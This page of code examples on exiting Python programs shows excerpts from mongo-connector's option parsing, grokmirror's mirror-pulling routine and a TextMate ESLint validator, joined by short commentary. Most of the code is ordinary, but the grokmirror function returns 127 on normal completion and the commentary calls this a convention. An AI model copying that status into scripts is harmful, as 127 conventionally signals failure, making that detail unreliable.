                    "Could not import %s. It could be that this doc manager ha"
                    "s been moved out of this project and is maintained elsewh"
                    "ere. Make sure that you have the doc manager installed al"
                    "ongside mongo-connector. Check the README for a list of a"
                    "vailable doc managers." % package)
                sys.exit(1)
            except (AttributeError, TypeError):
                raise errors.InvalidConfiguration(
                    "No definition for DocManager found in %s." % package)
                sys.exit(1)  # unreachable: the raise above exits first

        # instantiate the doc manager objects
        dm_instances = []
        for dm in option.value:
            if 'docManagerClassPath' in dm:
                DocManager = import_dm_by_path(dm['docManagerClassPath'])
            else:
                DocManager = import_dm_by_name(dm['docManager'])
            kwargs = {
                'unique_key': dm['uniqueKey'],
                'auto_commit_interval': dm['autoCommitInterval'],
                'chunk_size': dm['bulkSize']
            }
            for k in dm['args']:
                if k not in kwargs:
                    kwargs[k] = dm['args'][k]

            target_url = dm['targetURL']
            if target_url:
                dm_instances.append(DocManager(target_url, **kwargs))
            else:
                dm_instances.append(DocManager(**kwargs))

        option.value = dm_instances

    doc_managers = add_option(
        config_key="docManagers",
        default=None,
        type=list,
        apply_function=apply_doc_managers)

    # -d is to specify the doc manager file.
    doc_managers.add_cli(
        "-d", "--doc-manager", dest="doc_manager", help=
        "Used to specify the path to each doc manager "
        "file that will be used. DocManagers should be "
        "specified in the same order as their respective "
        "target addresses in the --target-urls option. "
        "URLs are assigned to doc managers "
        "respectively. Additional doc managers are "
        "implied to have no target URL. Additional URLs "
        "are implied to have the same doc manager type as "
        "the last doc manager for which a URL was "
        "specified. By default, Mongo Connector will use "
        "'doc_manager_simulator.py'.  It is recommended "
        "that all doc manager files be kept in the "
        "doc_managers folder in mongo-connector. For "
        "more information about making your own doc "
        "manager, see 'Writing Your Own DocManager' "
        "section of the wiki")

    # -t is to specify the URL to each target system.
    doc_managers.add_cli(
        "-t", "--target-url",
        dest="target_url", help=
        "Specify the URL to each target system being "
        "used. For example, if you were using Solr out of "
        "the box, you could use '-t "
        "http://localhost:8080/solr' with the "
        "SolrDocManager to establish a proper connection. "
        "URLs should be specified in the same order as "
        "their respective doc managers in the "
        "--doc-managers option.  URLs are assigned to doc "
        "managers respectively. Additional doc managers "
        "are implied to have no target URL. Additional "
        "URLs are implied to have the same doc manager "
        "type as the last doc manager for which a URL was "
        "specified. "
        "Don't use quotes around addresses. ")

    # -u is to specify the mongoDB field that will serve as the unique key
    # for the target system,
    doc_managers.add_cli(
        "-u", "--unique-key", dest="unique_key", help=
        "The name of the MongoDB field that will serve "
        "as the unique key for the target system. "
        "Note that this option does not apply "
        "when targeting another MongoDB cluster. "
        "Defaults to \"_id\".")

    # --auto-commit-interval to specify auto commit time interval
    doc_managers.add_cli(
        "--auto-commit-interval", type="int",
        dest="auto_commit_interval", help=
        "Seconds in-between calls for the Doc Manager"
        " to commit changes to the target system. A value of"
        " 0 means to commit after every write operation."
        " When left unset, Mongo Connector will not make"
        " explicit commits. Some systems have"
        " their own mechanism for adjusting a commit"
        " interval, which should be preferred to this"
        " option.")

    continue_on_error = add_option(
        config_key="continueOnError",
        default=False,
        type=bool)

    def apply_ssl(option, cli_values):
        option.value = option.value or {}
        ssl_certfile = cli_values.pop('ssl_certfile')
        ssl_keyfile = cli_values.pop('ssl_keyfile')
        ssl_cert_reqs = cli_values.pop('ssl_cert_reqs')
        ssl_ca_certs = (
            cli_values.pop('ssl_ca_certs') or option.value.get('sslCACerts'))

        if ssl_cert_reqs and ssl_cert_reqs != 'ignored' and not ssl_ca_certs:
            raise errors.InvalidConfiguration(
                '--ssl-ca-certs must be provided if the '
                '--ssl-certificate-policy is not "ignored".')
        option.value.setdefault('sslCertfile', ssl_certfile)
        option.value.setdefault('sslCACerts', ssl_ca_certs)
        option.value.setdefault('sslKeyfile', ssl_keyfile)
        option.value['sslCertificatePolicy'] = _SSL_POLICY_MAP.get(
            ssl_cert_reqs)
    ssl = add_option(
        config_key="ssl",
        default={},
        type=dict,
        apply_function=apply_ssl)
    ssl.add_cli(
        '--ssl-certfile', dest='ssl_certfile',
        help=('Path to a certificate identifying the local connection '
              'to MongoDB.')
    )
    ssl.add_cli(
        '--ssl-keyfile', dest='ssl_keyfile',
        help=('Path to the private key for --ssl-certfile. '
              'Not necessary if already included in --ssl-certfile.')
    )
    ssl.add_cli(
        '--ssl-certificate-policy', dest='ssl_cert_reqs',
        choices=('required', 'optional', 'ignored'),
        help=('Policy for validating SSL certificates provided from the other '
              'end of the connection. There are three possible values: '
              'required = Require and validate the remote certificate. '
              'optional = Validate the remote certificate only if one '
              'is provided. '
              'ignored = Remote SSL certificates are ignored completely.')
    )
    ssl.add_cli(
        '--ssl-ca-certs', dest='ssl_ca_certs',
        help=('Path to a concatenated set of certificate authority '
              'certificates to validate the other side of the connection. ')
    )

    # --continue-on-error to continue to upsert documents during a collection
    # dump, even if the documents cannot be inserted for some reason
    continue_on_error.add_cli(
        "--continue-on-error", action="store_true",
        dest="continue_on_error", help=
        "By default, if any docuement fails to upsert"
        " during a collection dump, the entire operation fails."
        " When this flag is enabled, normally fatal errors"
        " will be caught and logged, allowing the collection"
        " dump to continue.\n"
        "Note: Applying oplog operations to an incomplete"
        " set of docuements due to errors may cause undefined"
        " behavior. Use this flag to dump only.")

    config_file = add_option()
    config_file.add_cli(
        "-c", "--config-file", dest="config_file", help=
        "Specify a JSON file to load configurations from. You can find"
        " an example config file at mongo-connector/config.json")

    tz_aware = add_option(
        config_key="timezoneAware", default=False, type=bool)
    tz_aware.add_cli(
        "--tz-aware", dest="tz_aware", action="store_true",
        help="Make all dates and times timezone-aware.")

    return result

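One detail worth flagging in the example above: inside import_dm_by_path, the sys.exit(1) calls sit after raise statements and can never execute, since raise leaves the function immediately (sys.exit itself works the same way, by raising SystemExit). A minimal sketch of the effect, using a hypothetical load_plugin helper:

import sys


def load_plugin(path):
    try:
        return __import__(path)
    except ImportError:
        raise ValueError('Could not import %s.' % path)
        sys.exit(1)  # dead code: the raise above already left the function


try:
    plugin = load_plugin('no_such_module')
except ValueError as e:
    # converting the exception to an exit status at the top level
    # is enough; this prints the message to stderr and exits with 1
    sys.exit(str(e))
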
Example 169

Project: grokmirror Source File: pull.py
def pull_mirror(name, config, verbose=False, force=False, nomtime=False,
                verify=False, verify_subpath='*', noreuse=False,
                purge=False, pretty=False, forcepurge=False):
    global logger
    global lock_fails

    logger = logging.getLogger(name)
    logger.setLevel(logging.DEBUG)

    if 'log' in config.keys():
        ch = logging.FileHandler(config['log'])
        formatter = logging.Formatter(
            "[%(process)d] %(asctime)s - %(levelname)s - %(message)s")
        ch.setFormatter(formatter)
        loglevel = logging.INFO

        if 'loglevel' in config.keys():
            if config['loglevel'] == 'debug':
                loglevel = logging.DEBUG

        ch.setLevel(loglevel)
        logger.addHandler(ch)

    ch = logging.StreamHandler()
    formatter = logging.Formatter('%(message)s')
    ch.setFormatter(formatter)

    if verbose:
        ch.setLevel(logging.INFO)
    else:
        ch.setLevel(logging.CRITICAL)

    logger.addHandler(ch)

    # push it into grokmirror to override the default logger
    grokmirror.logger = logger

    logger.info('Checking [%s]' % name)
    mymanifest = config['mymanifest']

    if verify:
        logger.info('Verifying mirror against %s' % config['manifest'])
        nomtime = True

    if config['manifest'].find('file:///') == 0:
        manifile = config['manifest'].replace('file://', '')
        if not os.path.exists(manifile):
            logger.critical('Remote manifest not found in %s! Quitting!'
                            % config['manifest'])
            return 1

        fstat = os.stat(manifile)
        last_modified = fstat[8]
        logger.debug('mtime on %s is: %s' % (manifile, fstat[8]))

        if os.path.exists(config['mymanifest']):
            fstat = os.stat(config['mymanifest'])
            my_last_modified = fstat[8]
            logger.debug('Our last-modified is: %s' % my_last_modified)
            if not (force or nomtime) and last_modified <= my_last_modified:
                logger.info('Manifest file unchanged. Quitting.')
                return 0

        logger.info('Reading new manifest from %s' % manifile)
        manifest = grokmirror.read_manifest(manifile)
        # Don't accept empty manifests -- that indicates something is wrong
        if not len(manifest.keys()):
            logger.critical('Remote manifest empty or unparseable! Quitting.')
            return 1

    else:
        # Load it from remote host using http and header magic
        logger.info('Fetching remote manifest from %s' % config['manifest'])

        # Do we have username:password@ in the URL?
        chunks = urlparse.urlparse(config['manifest'])
        if chunks.netloc.find('@') > 0:
            logger.debug('Taking username/password from the URL for basic auth')
            (upass, netloc) = chunks.netloc.split('@')
            if upass.find(':') > 0:
                (username, password) = upass.split(':')
            else:
                username = upass
                password = ''

            manifesturl = config['manifest'].replace(chunks.netloc, netloc)
            logger.debug('manifesturl=%s' % manifesturl)
            request = urllib2.Request(manifesturl)

            password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
            password_mgr.add_password(None, manifesturl, username, password)
            auth_handler = urllib2.HTTPBasicAuthHandler(password_mgr)
            opener = urllib2.build_opener(auth_handler)

        else:
            request = urllib2.Request(config['manifest'])
            opener = urllib2.build_opener()

        # Find out if we need to run at all first
        if not (force or nomtime) and os.path.exists(mymanifest):
            fstat = os.stat(mymanifest)
            mtime = fstat[8]
            logger.debug('mtime on %s is: %s' % (mymanifest, mtime))
            my_last_modified = time.strftime('%a, %d %b %Y %H:%M:%S GMT',
                                             time.gmtime(mtime))
            logger.debug('Our last-modified is: %s' % my_last_modified)
            request.add_header('If-Modified-Since', my_last_modified)

        try:
            ufh = opener.open(request, timeout=30)
        except urllib2.HTTPError, ex:
            if ex.code == 304:
                logger.info('Server says we have the latest manifest. '
                            'Quitting.')
                return 0
            logger.warning('Could not fetch %s' % config['manifest'])
            logger.warning('Server returned: %s' % ex)
            return 1
        except urllib2.URLError, ex:
            logger.warning('Could not fetch %s' % config['manifest'])
            logger.warning('Error was: %s' % ex)
            return 1

        last_modified = ufh.headers.get('Last-Modified')
        last_modified = time.strptime(last_modified, '%a, %d %b %Y %H:%M:%S %Z')
        last_modified = calendar.timegm(last_modified)

        # We don't use read_manifest for the remote manifest, as it can be
        # anything, really. For now, blindly open it with gzipfile if it ends
        # with .gz. XXX: some http servers will auto-deflate such files.
        try:
            if config['manifest'].find('.gz') > 0:
                fh = gzip.GzipFile(fileobj=StringIO(ufh.read()))
            else:
                fh = ufh

            jdata = fh.read()
            fh.close()

            manifest = anyjson.deserialize(jdata)

        except Exception, ex:
            logger.warning('Failed to parse %s' % config['manifest'])
            logger.warning('Error was: %s' % ex)
            return 1

    mymanifest = grokmirror.read_manifest(mymanifest)

    culled = cull_manifest(manifest, config)

    to_clone = []
    to_pull = []
    existing = []

    toplevel = config['toplevel']
    if not os.access(toplevel, os.W_OK):
        logger.critical('Toplevel %s does not exist or is not writable'
                        % toplevel)
        sys.exit(1)

    if 'pull_threads' in config.keys():
        pull_threads = int(config['pull_threads'])
        if pull_threads < 1:
            logger.info('pull_threads is less than 1, forcing to 1')
            pull_threads = 1
    else:
        # be conservative
        logger.info('pull_threads is not set, consider setting it')
        pull_threads = 5

    logger.info('Comparing repository info')

    for gitdir in culled.keys():
        fullpath = os.path.join(toplevel, gitdir.lstrip('/'))

        # fingerprints were added in later versions, so handle the case where
        # the upstream manifest doesn't have a fingerprint
        if 'fingerprint' not in culled[gitdir]:
            culled[gitdir]['fingerprint'] = None

        # Attempt to lock the repo
        try:
            grokmirror.lock_repo(fullpath, nonblocking=True)
        except IOError:
            logger.info('Could not lock %s, skipping' % gitdir)
            lock_fails.append(gitdir)
            # Force the fingerprint to what we have in mymanifest,
            # if we have it.
            culled[gitdir]['fingerprint'] = None
            if gitdir in mymanifest and 'fingerprint' in mymanifest[gitdir]:
                culled[gitdir]['fingerprint'] = mymanifest[gitdir][
                    'fingerprint']
            if len(lock_fails) >= pull_threads:
                logger.info('Too many repositories locked (%s). Exiting.'
                            % len(lock_fails))
                return 0
            continue

        if verify:
            if culled[gitdir]['fingerprint'] is None:
                logger.debug('No fingerprint for %s, not verifying' % gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

            if not fnmatch.fnmatch(gitdir, verify_subpath):
                grokmirror.unlock_repo(fullpath)
                continue

            logger.debug('Verifying %s' % gitdir)
            if not os.path.exists(fullpath):
                verify_fails.append(gitdir)
                logger.info('Verify: %s ABSENT' % gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

            my_fingerprint = grokmirror.get_repo_fingerprint(
                toplevel, gitdir, force=force)

            if my_fingerprint == culled[gitdir]['fingerprint']:
                logger.info('Verify: %s OK' % gitdir)
            else:
                logger.critical('Verify: %s FAILED' % gitdir)
                verify_fails.append(gitdir)

            grokmirror.unlock_repo(fullpath)
            continue

        # Is the directory in place?
        if os.path.exists(fullpath):
            # Fix owner and description, if necessary
            if gitdir in mymanifest.keys():
                # This code is hurky and needs to be cleaned up
                desc = culled[gitdir].get('description')
                owner = culled[gitdir].get('owner')
                ref = None
                if config['ignore_repo_references'] != 'yes':
                    ref = culled[gitdir].get('reference')

                mydesc = mymanifest[gitdir].get('description')
                myowner = mymanifest[gitdir].get('owner')
                myref = None
                if config['ignore_repo_references'] != 'yes':
                    myref = mymanifest[gitdir].get('reference')

                if owner is None:
                    owner = config['default_owner']
                if myowner is None:
                    myowner = config['default_owner']

                if desc != mydesc or owner != myowner or ref != myref:
                    # we can do this right away without waiting
                    set_repo_params(toplevel, gitdir, owner, desc, ref)

            else:
                # It exists on disk, but not in my manifest?
                if noreuse:
                    logger.critical('Found existing git repo in %s' % fullpath)
                    logger.critical('But you asked NOT to reuse repos')
                    logger.critical('Skipping %s' % gitdir)
                    grokmirror.unlock_repo(fullpath)
                    continue

                logger.info('Setting new origin for %s' % gitdir)
                fix_remotes(gitdir, toplevel, config['site'])
                to_pull.append(gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

            # fingerprints were added late, so if we don't have them
            # in the remote manifest, fall back on using timestamps
            changed = False
            if culled[gitdir]['fingerprint'] is not None:
                logger.debug('Will use fingerprints to compare %s' % gitdir)
                my_fingerprint = grokmirror.get_repo_fingerprint(toplevel,
                                                                 gitdir,
                                                                 force=force)

                if my_fingerprint != culled[gitdir]['fingerprint']:
                    logger.debug('No fingerprint match, will pull %s' % gitdir)
                    changed = True
                else:
                    logger.debug('Fingerprints match, skipping %s' % gitdir)
            else:
                logger.debug('Will use timestamps to compare %s' % gitdir)
                if force:
                    logger.debug('Will force-pull %s' % gitdir)
                    changed = True
                    # set timestamp to 0 as well
                    grokmirror.set_repo_timestamp(toplevel, gitdir, 0)
                else:
                    ts = grokmirror.get_repo_timestamp(toplevel, gitdir)
                    if ts < culled[gitdir]['modified']:
                        changed = True

            if changed:
                to_pull.append(gitdir)
                grokmirror.unlock_repo(fullpath)
                continue
            else:
                logger.debug('Repo %s unchanged' % gitdir)
                # if we don't have a fingerprint for it, add it now
                if culled[gitdir]['fingerprint'] is None:
                    fpr = grokmirror.get_repo_fingerprint(toplevel, gitdir)
                    culled[gitdir]['fingerprint'] = fpr
                existing.append(gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

        else:
            # Newly incoming repo
            to_clone.append(gitdir)
            grokmirror.unlock_repo(fullpath)
            continue

        # If we got here, something is odd.
        # noinspection PyUnreachableCode
        logger.critical('Could not figure out what to do with %s' % gitdir)
        grokmirror.unlock_repo(fullpath)

    if verify:
        if len(verify_fails):
            logger.critical('%s repos failed to verify' % len(verify_fails))
            return 1
        else:
            logger.info('Verification successful')
            return 0

    hookscript = config['post_update_hook']

    # XXX: 0.4.0 final: fix so we can ctrl-c out of threads

    if len(to_pull):
        if len(lock_fails) > 0:
            pull_threads -= len(lock_fails)

        # Don't spin up more threads than we need
        if pull_threads > len(to_pull):
            pull_threads = len(to_pull)

        # exit if we're ever at 0 pull_threads. Shouldn't happen, but some extra
        # precaution doesn't hurt
        if pull_threads <= 0:
            logger.info('Too many repositories locked. Exiting.')
            return 0

        logger.info('Will use %d threads to pull repos' % pull_threads)

        logger.info('Updating %s repos from %s'
                    % (len(to_pull), config['site']))
        in_queue = Queue.Queue()
        out_queue = Queue.Queue()

        for gitdir in to_pull:
            in_queue.put((gitdir, culled[gitdir]['fingerprint'],
                          culled[gitdir]['modified']))

        for i in range(pull_threads):
            logger.debug('Spun up thread %s' % i)
            t = PullerThread(in_queue, out_queue, config, i)
            t.setDaemon(True)
            t.start()

        # wait till it's all done
        in_queue.join()
        logger.info('All threads finished.')

        while not out_queue.empty():
            # see if any of it failed
            (gitdir, my_fingerprint, status) = out_queue.get()
            # We always record our fingerprint in our manifest
            culled[gitdir]['fingerprint'] = my_fingerprint
            if not status:
                # To make sure we check this again during next run,
                # fudge the manifest accordingly.
                logger.debug('Will recheck %s during next run' % gitdir)
                culled[gitdir] = mymanifest[gitdir]
                # this is rather hackish, but effective
                last_modified -= 1

    # how many lockfiles have we seen?
    # If there are more lock_fails than there are
    # pull_threads configured, we skip cloning out of caution
    if len(to_clone) and len(lock_fails) > pull_threads:
        logger.info('Too many repositories locked. Skipping cloning new repos.')
        to_clone = []

    if len(to_clone):
        logger.info('Cloning %s repos from %s'
                    % (len(to_clone), config['site']))
        # we use "existing" to track which repos can be used as references
        existing.extend(to_pull)

        to_clone_sorted = []
        clone_order(to_clone, manifest, to_clone_sorted, existing)

        for gitdir in to_clone_sorted:
            # Do we still need to clone it, or has another process
            # already done this for us?
            ts = grokmirror.get_repo_timestamp(toplevel, gitdir)

            if ts > 0:
                logger.debug('Looks like %s already cloned, skipping' % gitdir)
                continue

            fullpath = os.path.join(toplevel, gitdir.lstrip('/'))

            try:
                grokmirror.lock_repo(fullpath, nonblocking=True)
            except IOError:
                logger.info('Could not lock %s, skipping' % gitdir)
                lock_fails.append(gitdir)
                continue

            reference = None
            if config['ignore_repo_references'] != 'yes':
                reference = culled[gitdir]['reference']

            if reference is not None and reference in existing:
                # Make sure we can lock the reference repo
                refrepo = os.path.join(toplevel, reference.lstrip('/'))
                try:
                    grokmirror.lock_repo(refrepo, nonblocking=True)
                    success = clone_repo(toplevel, gitdir, config['site'],
                                         reference=reference)
                    grokmirror.unlock_repo(refrepo)
                except IOError:
                    logger.info('Cannot lock reference repo %s, skipping %s' %
                                (reference, gitdir))
                    if reference not in lock_fails:
                        lock_fails.append(reference)

                    grokmirror.unlock_repo(fullpath)
                    continue
            else:
                success = clone_repo(toplevel, gitdir, config['site'])

            # check dir to make sure cloning succeeded and then add to existing
            if os.path.exists(fullpath) and success:
                logger.debug('Cloning of %s succeeded, adding to existing'
                             % gitdir)
                existing.append(gitdir)

                desc = culled[gitdir].get('description')
                owner = culled[gitdir].get('owner')
                ref = culled[gitdir].get('reference')

                if owner is None:
                    owner = config['default_owner']
                set_repo_params(toplevel, gitdir, owner, desc, ref)
                set_agefile(toplevel, gitdir, culled[gitdir]['modified'])
                my_fingerprint = grokmirror.set_repo_fingerprint(toplevel,
                                                                 gitdir)
                culled[gitdir]['fingerprint'] = my_fingerprint
                run_post_update_hook(hookscript, toplevel, gitdir)
            else:
                logger.critical('Was not able to clone %s' % gitdir)
                # Remove it from our manifest so we can try re-cloning
                # next time grok-pull runs
                del culled[gitdir]
                git_fails.append(gitdir)

            grokmirror.unlock_repo(fullpath)

    # loop through all entries and find any symlinks we need to set
    # We also collect all symlinks to do purging correctly
    symlinks = []
    for gitdir in culled.keys():
        if 'symlinks' in culled[gitdir].keys():
            source = os.path.join(config['toplevel'], gitdir.lstrip('/'))
            for symlink in culled[gitdir]['symlinks']:
                if symlink not in symlinks:
                    symlinks.append(symlink)
                target = os.path.join(config['toplevel'], symlink.lstrip('/'))

                if os.path.exists(source):
                    if os.path.islink(target):
                        # are you pointing to where we need you?
                        if os.path.realpath(target) != source:
                            # Remove symlink and recreate below
                            logger.debug('Removed existing wrong symlink %s'
                                         % target)
                            os.unlink(target)
                    elif os.path.exists(target):
                        logger.warn('Deleted repo %s, because it is now'
                                    ' a symlink to %s' % (target, source))
                        shutil.rmtree(target)

                    # Here we re-check if we still need to do anything
                    if not os.path.exists(target):
                        logger.info('Symlinking %s -> %s' % (target, source))
                        # Make sure the leading dirs are in place
                        if not os.path.exists(os.path.dirname(target)):
                            os.makedirs(os.path.dirname(target))
                        os.symlink(source, target)

    manifile = config['mymanifest']
    grokmirror.manifest_lock(manifile)

    # Is the local manifest newer than last_modified? That would indicate
    # that another process has run and "culled" is no longer the latest info
    if os.path.exists(manifile):
        fstat = os.stat(manifile)
        if fstat[8] > last_modified:
            logger.info('Local manifest is newer, not saving.')
            grokmirror.manifest_unlock(manifile)
            return 0

    if purge:
        to_purge = []
        found_repos = 0
        for founddir in grokmirror.find_all_gitdirs(config['toplevel']):
            gitdir = founddir.replace(config['toplevel'], '')
            found_repos += 1

            if gitdir not in culled.keys() and gitdir not in symlinks:
                to_purge.append(founddir)

        if len(to_purge):
            # Purge-protection engage
            try:
                purge_limit = int(config['purgeprotect'])
                assert 1 <= purge_limit <= 99
            except (ValueError, AssertionError):
                logger.critical('Warning: "%s" is not valid for purgeprotect.'
                                % config['purgeprotect'])
                logger.critical('Please set to a number between 1 and 99.')
                logger.critical('Defaulting to purgeprotect=5.')
                purge_limit = 5

            purge_pc = len(to_purge) * 100 / found_repos
            logger.debug('purgeprotect=%s' % purge_limit)
            logger.debug('purge percentage=%s' % purge_pc)

            if not forcepurge and purge_pc >= purge_limit:
                logger.critical('Refusing to purge %s repos (%s%%)'
                                % (len(to_purge), purge_pc))
                logger.critical('Set purgeprotect to a higher percentage, or'
                                ' override with --force-purge.')
                logger.info('Not saving local manifest')
                return 1
            else:
                for founddir in to_purge:
                    if os.path.islink(founddir):
                        # report the symlink itself; gitdir is stale here,
                        # left over from the discovery loop above
                        logger.info('Removing unreferenced symlink %s'
                                    % founddir)
                        os.unlink(founddir)
                    else:
                        try:
                            logger.info('Purging %s' % founddir)
                            grokmirror.lock_repo(founddir, nonblocking=True)
                            shutil.rmtree(founddir)
                        except IOError:
                            lock_fails.append(founddir)
                            logger.info('%s is locked, not purging'
                                        % founddir)

    # Go through all repos in culled and get the latest local timestamps.
    for gitdir in culled:
        ts = grokmirror.get_repo_timestamp(toplevel, gitdir)
        culled[gitdir]['modified'] = ts

    # If there were any lock failures, we fudge last_modified to always
    # be older than the server, which will force the next grokmirror run.
    if len(lock_fails):
        logger.info('%s repos could not be locked. Forcing next run.'
                    % len(lock_fails))
        last_modified -= 1
    elif len(git_fails):
        logger.info('%s repos failed. Forcing next run.'
                    % len(git_fails))
        last_modified -= 1

    # Once we're done, save culled as our new manifest
    grokmirror.write_manifest(manifile, culled, mtime=last_modified,
                              pretty=pretty)

    grokmirror.manifest_unlock(manifile)

    # write out projects.list, if asked to
    write_projects_list(culled, config)

    return 127
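
The sys.exit for this example lives in its caller: the function above returns an integer status (0 on the early-exit paths, 1 on verification or purge-protection failures, 127 on the normal completion path), and the command-line entry point presumably hands that value straight to sys.exit. A minimal sketch of the same pattern, using hypothetical names (sync_mirror):

import sys

def sync_mirror(verify=False):
    # Status convention as in the example above:
    # 0 = nothing to do / early exit, 1 = failure, 127 = normal completion.
    verify_fails = []          # pretend verification found no problems
    if verify:
        return 1 if verify_fails else 0
    return 127

if __name__ == '__main__':
    # Forward the status to the shell so wrapper scripts can branch on it.
    sys.exit(sync_mirror(verify=True))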

Example 170

Project: javascript-eslint.tmbundle Source File: validate.py
def validate(quiet=False):
    # absolute path of this file, used to reference other files
    my_dir = os.path.abspath(os.path.dirname(__file__))

    # build eslint args
    args = [
        os.environ.get('TM_JAVASCRIPT_ESLINT_ESLINT', 'eslint'),
        '-f',
        'compact',
        '--no-color',
        '--stdin'
    ]

    # if we know the filename, pass it
    if 'TM_FILEPATH' in os.environ:
        args.append('--stdin-filename')
        args.append(os.path.basename(os.environ['TM_FILEPATH']))

    # the working directory; used by eslint to find its config files
    cwd = os.environ.get('TM_DIRECTORY', None)
    if not cwd:
        cwd = os.environ.get('TM_PROJECT_DIRECTORY', None)

    # Build env for our command: ESLint (and Node) are often
    # installed to /usr/local/bin, which may not be on the
    # bundle’s PATH in a default install of TextMate.
    env = os.environ.copy()
    path_parts = env['PATH'].split(':')
    if '/bin' not in path_parts:
        path_parts.append('/bin')
    if '/usr/bin' not in path_parts:
        path_parts.append('/usr/bin')
    if '/usr/local/bin' not in path_parts:
        path_parts.append('/usr/local/bin')
    env['PATH'] = ':'.join(path_parts)

    try:
        eslint = subprocess.Popen(
            args,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=env,
            cwd=cwd
        )
    except OSError as e:
        msg = [
            'Hi there. This is the “JavaScript ESLint” bundle for ' +
            'TextMate. I validate your code using ESLint.',
            '',
            'I had the following problem running <code>eslint</code>:',
            '',
            '<code>%s</code>' % e,
            '',
            '<h4>How to fix it</h4>',
            'Make sure the <code>eslint</code> and <code>node</code> ' +
            'commands are on the <code>PATH</code>.',
            '',
            '<ol>' +
            '   <li>Go to <i>TextMate</i> > <i>Preferences…</i> > ' +
            '       <i>Variables</i></li>' +
            '   <li>Ensure the <code>PATH</code> is enabled there and that ' +
            '       it includes the location of your <code>eslint</code> ' +
            '       and <code>node</code> commands.</li>'
            '</ol>',
            'The path currently used by TextMate bundles is:',
            '',
            '<div style="overflow:auto"><code>%s</code></div>' % env['PATH'],
            '<h4>How to disable validation</h4>',
            'If you mistakenly installed this validation tool and want to ' +
            'disable it, you can do so in TextMate:',
            '',
            '<ol>' +
            '   <li>On the TextMate menu, choose ' +
            '   <i>Bundles</i> > <i>Edit Bundles…</i></li>' +
            '   <li>Locate “JavaScript ESLint”</li>' +
            '   <li>Uncheck “Enable this item”</li>' +
            '   <li>Close the Bundle Editor and choose “Save”</li>' +
            '</ol>'
        ]
        show_error_message('<br>'.join(msg))
        sys.exit()

    # Pipe stdin to the subprocess; if we are validating an HTML
    # file with embedded JavaScript, only pipe content within the
    # <script>…</script> tags to the subprocess.
    lines = []
    if os.environ['TM_SCOPE'].startswith('source.js'):
        for line in sys.stdin:
            lines.append(line)
    else:
        start_tag = re.compile(r'(\<\s*script)[\s\>]', re.IGNORECASE)
        end_tag = re.compile(r'\<\/\s*script[\s\>]', re.IGNORECASE)
        state = 'IGNORE'
        for line in sys.stdin:
            while line:
                if state == 'IGNORE':
                    match = start_tag.search(line)
                    if match:
                        # found a script tag
                        line = ' ' * match.end(1) + line[match.end(1):]
                        state = 'LOOK_FOR_END_OF_OPENING_TAG'
                    else:
                        lines.append('\n')
                        line = None

                elif state == 'LOOK_FOR_END_OF_OPENING_TAG':
                    gt_pos = line.find('>')
                    if gt_pos != -1:
                        line = ' ' * (gt_pos + 1) + line[gt_pos + 1:]
                        state = 'PIPE_TO_OUTPUT'
                    else:
                        lines.append('\n')
                        line = None

                elif state == 'PIPE_TO_OUTPUT':
                    match = end_tag.search(line)
                    if match:
                        # found closing </script> tag
                        lines.append(line[:match.start()])
                        line = line[match.end():]
                        state = 'IGNORE'
                    else:
                        lines.append(line)
                        line = None

    (stdout, stderr) = eslint.communicate(''.join(lines))

    if stderr:
        msg = [
            'Hi there. This is the “JavaScript ESLint” bundle for ' +
            'TextMate. I validate your code using ESLint.',
            '',
            'I had the following problem running <code>eslint</code>:',
            '',
            '<code>%s</code>' % stderr,
            '',
            '<h4>How to disable validation</h4>',
            'If you mistakenly installed this validation tool and want to ' +
            '   disable it, you can do so in TextMate:',
            '',
            '<ol>' +
            '   <li>On the TextMate menu, choose ' +
            '   <i>Bundles</i> > <i>Edit Bundles…</i></li>' +
            '   <li>Locate “JavaScript ESLint”</li>' +
            '   <li>Uncheck “Enable this item”</li>' +
            '   <li>Close the Bundle Editor and choose “Save”</li>' +
            '</ol>'
        ]
        show_error_message('<br>'.join(msg))
        sys.exit()

    # parse the results

    rx = re.compile(
        r'^[^:]+\: line (?P<line>\d+), col (?P<character>\d+), '
        r'(?P<code>\w+) - (?P<reason>.+?)(\s\((?P<shortname>[\w\-]+)\))?$'
    )

    issues = []

    for line in stdout.split('\n'):
        line = line.strip()
        if not line:
            continue

        m = rx.match(line)

        if not m:
            continue

        issue = {
            'line': int(m.group('line')),
            'character': int(m.group('character')) + 1,
            'code': m.group('code'),
            'reason': m.group('reason')
        }

        if m.group('shortname'):
            issue['shortname'] = m.group('shortname')

        issues.append(issue)

    # normalize line numbers
    input_start_line = int(os.environ.get('TM_INPUT_START_LINE', 1)) - 1
    for issue in issues:
        issue['line'] += input_start_line

    # add URLs to the issues
    if 'TM_FILEPATH' in os.environ:
        url_maker = lambda x: \
            'txmt://open?url=file://%s&amp;line=%d&amp;column=%d' % \
            (os.environ['TM_FILEPATH'], x['line'], x['character'])
    else:
        url_maker = lambda x: \
            'txmt://open?line=%d&amp;column=%d' % (x['line'], x['character'])

    for issue in issues:
        issue['url'] = url_maker(issue)

    # context data we will send to JavaScript
    context = {
        'issues': issues,
        'timestamp': time.strftime('%c')
    }

    if 'TM_FILEPATH' in os.environ:
        context['fileUrl'] = \
            'txmt://open?url=file://%s' % os.environ['TM_FILEPATH']
        context['targetFilename'] = os.path.basename(os.environ['TM_FILEPATH'])
    else:
        context['fileUrl'] = 'txmt://open?line=1&amp;column=0'
        context['targetFilename'] = '(current unsaved file)'

    # Identify the marker file that we will use to indicate the
    # TM_FILEPATH of the file currently shown in the validation
    # window.
    markerDir = get_marker_directory()
    hash = hashlib.sha224(context['fileUrl']).hexdigest()
    context['markerFile'] = os.path.join(markerDir, hash + '.marker')

    context['errorCount'] = \
        len([_ for _ in context['issues'] if _['code'][0] == 'E'])
    context['warningCount'] = \
        len([_ for _ in context['issues'] if _['code'][0] == 'W'])

    if context['errorCount'] == 0 and context['warningCount'] == 0:
        # There are no errors or warnings. We can bail out if all of
        # the following are True:
        #
        #     * There is no validation window currently open for
        #       this document.
        #     * quiet is True.
        if not os.path.exists(context['markerFile']):
            if quiet:
                return

    # create the marker file
    markerFile = open(context['markerFile'], 'w+')
    markerFile.close()

    # read and prepare the template
    content_ejs_path = os.path.join(my_dir, 'content.ejs')
    content_ejs = open(content_ejs_path, 'r').read()

